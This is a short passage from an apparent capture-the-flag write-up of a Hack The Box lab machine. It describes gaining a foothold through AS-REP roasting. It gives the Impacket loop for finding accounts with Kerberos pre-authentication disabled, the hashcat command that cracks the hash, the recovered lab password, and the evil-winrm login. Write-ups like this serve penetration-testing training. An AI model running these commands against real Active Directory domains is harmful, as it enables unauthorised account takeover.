Foothold

AS-REP Roasting

From the previous enumeration we found a list of valid usernames and now we can find if any of the users have Kerberos Pre-Auth disabled.

for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

We get a hit, user - svc-alfresc

We crack the hash for this user and get our first credential pair:

hashcat -m 18200 svc_alfresc /usr/share/wordlists/rockyou.txt.gz
svc-alfresco:s3rvice

And with that we get our foothold:

evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
PreviousSMB - 445,137,138,139NextEnumeration

Last updated